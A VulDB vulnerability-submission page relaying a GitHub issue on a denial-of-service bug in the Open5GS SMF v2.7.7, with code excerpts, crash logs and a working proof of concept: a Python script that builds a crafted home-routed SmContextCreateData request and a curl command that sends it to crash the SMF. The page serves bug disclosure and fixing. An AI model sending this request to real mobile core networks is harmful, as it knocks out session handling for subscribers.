Submit #808486: Open5gs SMF v2.7.7 Denial of Serviceinfo

TitelOpen5gs SMF v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF crashes when a `SmContextCreateData` request includes `hSmfUri` and thus drives the session into the home-routed V-SMF path, but the supplied `dnn` is not a full DNN. In `smf_nsmf_handle_create_sm_context()`, a non-full `dnn` is accepted and stored as: ```c sess->session.name = ogs_strdup(SmContextCreateData->dnn); sess->full_dnn = NULL; ``` Later, after PFCP establishment, the HR V-SMF flow unconditionally builds `PduSessionCreateData` for the H-SMF and asserts that `sess->full_dnn` is present: ```c PduSessionCreateData.dnn = ogs_strdup(sess->full_dnn); ogs_assert(PduSessionCreateData.dnn); ``` So the route accepts a short DNN during session creation but fatally aborts when it later tries to forward the HR request toward the H-SMF. This issue is distinct from the previously confirmed `missing vcnTunnelInfo` and `vsmf-pdu-session` crashes. It affects the initial `sm-contexts` create path under HR semantics. ### Steps to reproduce 1. Start the Open5GS Docker lab. 2. Prepare a `SmContextCreateData` multipart request that includes: - a valid `hSmfUri`, so the SMF enters HR V-SMF mode - a short `dnn` such as `internet` - a minimal `n1SmMsg` payload in the format accepted by this handler ```bash python3 - <<'PY' from pathlib import Path import json boundary = 'REQBOUNDARY' body = { 'supi': 'imsi-001011234567898', 'pduSessionId': 7, 'dnn': 'internet', 'sNssai': {'sst': 1}, 'servingNfId': 'fake-amf', 'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'}, 'servingNetwork': {'mcc': '001', 'mnc': '01'}, 'n1SmMsg': {'contentId': '5gnas-sm'}, 'anType': '3GPP_ACCESS', 'ratType': 'NR', 'ueLocation': {'nrLocation': { 'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'}, 'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'}, 'ueLocationTimestamp': '2026-04-11T05:41:55Z' }}, 'smContextStatusUri': 'http://10.33.33.1:18081/namf-callback/v1/imsi-001011234567898/sm-context-status/7', 'hSmfUri': 'http://10.33.33.1:18080/nsmf-pdusession/v1/pdu-sessions' } # Minimal GSM-UE establishment request payload accepted by the HR path: n1 = bytes.fromhex('c191a1') parts = [] parts.append( (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) + json.dumps(body, separators=(',', ':')).encode() + b'\r\n' ) parts.append( (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n' f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) + n1 + b'\r\n' ) parts.append(f'--{boundary}--\r\n'.encode()) Path('/tmp/smctx_create_hr.multipart').write_bytes(b''.join(parts)) PY ``` 3. Send the request: ```bash curl --http2-prior-knowledge -m 10 -sS -i \ -X POST http://10.33.33.10/nsmf-pdusession/v1/sm-contexts \ -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \ --data-binary @/tmp/smctx_create_hr.multipart ``` 4. Check SMF state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --since 2026-04-11T05:41:55Z smf ``` ### Logs ```shell HTTP/2 201 location: http://smf.open5gs.org/nsmf-pdusession/v1/sm-contexts/3 {} exited 139 2026-04-11T05:42:13.980390637Z 04/11 05:42:13.320: [smf] INFO: [imsi-001011234567898:7] SMContextCreate HR Roaming in V-SMF (../src/smf/gsm-sm.c:299) 04/11 05:42:13.346: [core] ERROR: ogs_talloc_strdup: Expectation `ptr' failed. (../lib/core/ogs-strings.c:157) 04/11 05:42:13.346: [smf] FATAL: smf_nsmf_pdusession_build_create_data: Assertion `PduSessionCreateData.dnn' failed. (../src/smf/nsmf-build.c:105) ``` ### Expected behaviour SMF should reject HR session creation that lacks a full DNN with a normal HTTP error response. ### Observed Behaviour SMF first returns `201 Created` for the `sm-contexts` request, then aborts asynchronously while preparing the H-SMF create request, exiting with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4450
Benutzer
 FrankLin (UID 97501)
Einreichung20.04.2026 21:21 (vor 1 Monat)
Moderieren10.05.2026 17:44 (20 days later)
StatusAkzeptiert
VulDB Eintrag362566 [Open5GS bis 2.7.7 SMF smf_nsmf_handle_create_sm_context Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!